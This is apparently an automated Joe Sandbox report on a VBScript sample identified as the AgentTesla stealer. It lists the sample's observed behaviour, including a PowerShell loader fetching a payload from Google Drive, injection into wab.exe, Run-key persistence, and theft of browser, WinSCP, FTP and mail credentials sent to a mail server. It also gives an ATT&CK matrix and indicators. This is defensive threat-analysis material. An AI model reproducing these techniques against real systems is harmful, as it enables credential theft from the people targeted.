            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeCode function: 22_2_005F3675 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,22_2_005F3675
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.2590450166.00000000220F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.2590450166.00000000220A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 316, type: MEMORYSTR
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 00000012.00000002.2590450166.00000000220A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 316, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected AgentTesla
            Source: Yara matchFile source: 00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.2590450166.00000000220F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.2590450166.00000000220A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 316, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information221
            Scripting            		Valid Accounts231
            Windows Management Instrumentation            		221
            Scripting            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		2
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution            		1
            DLL Side-Loading            		111
            Process Injection            		2
            Obfuscated Files or Information            		1
            Credentials in Registry            		1
            File and Directory Discovery            		Remote Desktop Protocol2
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts112
            Command and Scripting Interpreter            		1
            Registry Run Keys / Startup Folder            		1
            Registry Run Keys / Startup Folder            		1
            Software Packing            		Security Account Manager35
            System Information Discovery            		SMB/Windows Admin Shares1
            Email Collection            		1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell            		Login HookLogin Hook1
            Timestomp            		NTDS1
            Query Registry            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets541
            Security Software Discovery            		SSHKeylogging13
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Masquerading            		Cached Domain Credentials1
            Process Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items261
            Virtualization/Sandbox Evasion            		DCSync261
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
            Process Injection            		Proc Filesystem1
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Hidden Files and Directories            		/etc/passwd and /etc/shadow1
            System Network Configuration Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            Rundll32            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430754 Sample: G4-TODOS.vbs Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 38 mail.cash4cars.nz 2->38 40 ip-api.com 2->40 42 2 other IPs or domains 2->42 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 Antivirus detection for URL or domain 2->56 58 7 other signatures 2->58 9 wscript.exe 1 2->9         started        12 newfile.exe 3 1 2->12         started        14 newfile.exe 1 2->14         started        16 rundll32.exe 2->16         started        signatures3 process4 signatures5 70 VBScript performs obfuscated calls to suspicious functions 9->70 72 Suspicious powershell command line found 9->72 74 Wscript starts Powershell (via cmd or directly) 9->74 76 3 other signatures 9->76 18 powershell.exe 14 19 9->18         started        process6 dnsIp7 44 drive.google.com 142.250.101.113, 443, 49706, 49711 GOOGLEUS United States 18->44 46 drive.usercontent.google.com 142.251.2.132, 443, 49707, 49712 GOOGLEUS United States 18->46 60 Suspicious powershell command line found 18->60 62 Very long command line found 18->62 64 Found suspicious powershell code related to unpacking or dynamic code loading 18->64 22 powershell.exe 17 18->22         started        25 conhost.exe 18->25         started        27 cmd.exe 1 18->27         started        signatures8 process9 signatures10 66 Writes to foreign memory regions 22->66 68 Found suspicious powershell code related to unpacking or dynamic code loading 22->68 29 wab.exe 16 10 22->29         started        34 cmd.exe 1 22->34         started        process11 dnsIp12 48 mail.cash4cars.nz 114.142.162.17, 26, 49715 SERVERMULE-AS-APNimbus2PtyLtdAU Australia 29->48 50 ip-api.com 208.95.112.1, 49714, 80 TUT-ASUS United States 29->50 36 C:\Users\user\AppData\Roaming\...\newfile.exe, PE32 29->36 dropped 78 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 29->78 80 Tries to steal Mail credentials (via file / registry access) 29->80 82 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 29->82 84 3 other signatures 29->84 file13 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            G4-TODOS.vbs5%ReversingLabsWin32.Dropper.Generic

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\newfile\newfile.exe0%ReversingLabs
            C:\Users\user\AppData\Roaming\newfile\newfile.exe0%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            bg.microsoft.map.fastly.net0%VirustotalBrowse
            mail.cash4cars.nz2%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
            https://go.micro0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://x1.c.lencr.org/00%URL Reputationsafe
            http://x1.i.lencr.org/00%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            http://r3.o.lencr.org00%URL Reputationsafe
            http://r3.i.lencr.org/0R0%Avira URL Cloudsafe
            http://mail.cash4cars.nz0%Avira URL Cloudsafe
            https://drive.googP0%Avira URL Cloudsafe
            https://drive.usercontent.googh0%Avira URL Cloudsafe
            https://drive.usercontent.google.comzE0%Avira URL Cloudsafe
            http://mail.cash4cars.nz2%VirustotalBrowse
            http://r3.i.lencr.org/0R0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            bg.microsoft.map.fastly.net
            		199.232.214.172
            		truefalseunknown
            mail.cash4cars.nz
            		114.142.162.17
            		truetrueunknown
            drive.google.com
            		142.250.101.113
            		truefalse
              		high
              drive.usercontent.google.com
              		142.251.2.132
              		truefalse
                		high
                ip-api.com
                		208.95.112.1
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://ip-api.com/line/?fields=hostingfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.2049632681.000002259006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1835301736.00000000058B7000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://r3.i.lencr.org/0Rwab.exe, 00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163783606.000000000665C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591088547.00000000240E1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591692165.000000002418B000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://mail.cash4cars.nzwab.exe, 00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 2%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://drive.usercontent.google.compowershell.exe, 00000005.00000002.1942203516.0000022580552000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.1833657924.00000000049A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1836814367.000000000735A000.00000004.00000020.00020000.00000000.sdmptrue
                        • URL Reputation: malware
                        		unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.1833657924.00000000049A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1836814367.000000000735A000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://go.micropowershell.exe, 00000005.00000002.1942203516.0000022581566000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/Licensepowershell.exe, 0000000D.00000002.1835301736.00000000058B7000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://drive.google.com/qwab.exe, 00000012.00000003.2163783606.000000000665C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2573561659.000000000665D000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/Iconpowershell.exe, 0000000D.00000002.1835301736.00000000058B7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://drive.googPpowershell.exe, 00000005.00000002.1942203516.00000225821F6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://drive.usercontent.googhpowershell.exe, 00000005.00000002.1942203516.0000022582221000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://drive.usercontent.google.com/wab.exe, 00000012.00000003.2163783606.000000000669E000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://drive.usercontent.google.comzEpowershell.exe, 00000005.00000002.1942203516.0000022580540000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://drive.google.compowershell.exe, 00000005.00000002.1942203516.00000225821FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.1833657924.00000000049A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1836814367.000000000735A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.google.compowershell.exe, 00000005.00000002.1942203516.000002258221D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.00000225821FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022582221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.000002258053C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580522000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580540000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810542746.00000000066B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810446940.00000000066B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://aka.ms/pscore6lBpowershell.exe, 0000000D.00000002.1833657924.0000000004851000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://x1.c.lencr.org/0wab.exe, 00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163783606.000000000665C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163757481.000000002411B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591168112.0000000024125000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2573561659.000000000665D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591692165.000000002418B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1962799841.0000000024120000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163989481.0000000024124000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://x1.i.lencr.org/0wab.exe, 00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163783606.000000000665C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163757481.000000002411B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591168112.0000000024125000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2573561659.000000000665D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591692165.000000002418B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1962799841.0000000024120000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163989481.0000000024124000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://contoso.com/powershell.exe, 0000000D.00000002.1835301736.00000000058B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.2049632681.000002259006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1835301736.00000000058B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://ip-api.comwab.exe, 00000012.00000002.2590450166.0000000022071000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://r3.o.lencr.org0wab.exe, 00000012.00000002.2590450166.00000000220D0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.2163783606.000000000665C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591088547.00000000240E1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2591692165.000000002418B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://drive.google.compowershell.exe, 00000005.00000002.1942203516.00000225820DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580228000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://drive.usercontent.google.compowershell.exe, 00000005.00000002.1942203516.0000022582221000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://aka.ms/pscore68powershell.exe, 00000005.00000002.1942203516.0000022580001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://apis.google.compowershell.exe, 00000005.00000002.1942203516.000002258221D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.00000225821FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022582221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.000002258053C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580522000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1942203516.0000022580540000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810542746.00000000066B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000003.1810446940.00000000066B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://drive.google.com/iwab.exe, 00000012.00000003.2163783606.000000000665C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2573561659.000000000665D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.1942203516.0000022580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1833657924.0000000004851000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000012.00000002.2590450166.0000000022071000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      208.95.112.1
                                                      		ip-api.comUnited States
                                                      		53334TUT-ASUSfalse
                                                      114.142.162.17
                                                      		mail.cash4cars.nzAustralia
                                                      		133525SERVERMULE-AS-APNimbus2PtyLtdAUtrue
                                                      142.250.101.113
                                                      		drive.google.comUnited States
                                                      		15169GOOGLEUSfalse
                                                      142.251.2.132
                                                      		drive.usercontent.google.comUnited States
                                                      		15169GOOGLEUSfalse

                                                      General Information

                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                      Analysis ID:1430754
                                                      Start date and time:2024-04-24 06:45:19 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 8m 14s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:26
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:G4-TODOS.vbs
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.expl.evad.winVBS@15/8@5/4
                                                      EGA Information:
                                                      • Successful, ratio: 50%
                                                      HCA Information:
                                                      • Successful, ratio: 90%
                                                      • Number of executed functions: 34
                                                      • Number of non-executed functions: 13
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .vbs

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target powershell.exe, PID 2080 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 4632 because it is empty
                                                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      05:47:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run newfile C:\Users\user\AppData\Roaming\newfile\newfile.exe
                                                      05:47:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run newfile C:\Users\user\AppData\Roaming\newfile\newfile.exe
                                                      06:46:05API Interceptor4036x Sleep call for process: powershell.exe modified
                                                      06:47:02API Interceptor84x Sleep call for process: wab.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      208.95.112.1RICHIESTA-QUOTAZIONI.jarGet hashmaliciousSTRRATBrowse
                                                      • ip-api.com/json/
                                                      explorer.exeGet hashmaliciousRedLine, XWormBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      X1.exeGet hashmaliciousXWormBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      X2.exeGet hashmaliciousXWormBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      55HUe105hhh123333.exeGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      PI88009454 007865EQ.exeGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      Request for Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      Factura E24000319v00. SL.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      QUOTATION_APRQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      114.142.162.17http://otahuhumainstreet.co.nzGet hashmaliciousUnknownBrowse
                                                      • otahuhumainstreet.co.nz/

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      ip-api.comRICHIESTA-QUOTAZIONI.jarGet hashmaliciousSTRRATBrowse
                                                      • 208.95.112.1
                                                      explorer.exeGet hashmaliciousRedLine, XWormBrowse
                                                      • 208.95.112.1
                                                      X1.exeGet hashmaliciousXWormBrowse
                                                      • 208.95.112.1
                                                      Output.exeGet hashmaliciousRedLine, XWormBrowse
                                                      • 208.95.112.1
                                                      X2.exeGet hashmaliciousXWormBrowse
                                                      • 208.95.112.1
                                                      55HUe105hhh123333.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      PI88009454 007865EQ.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      file.exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
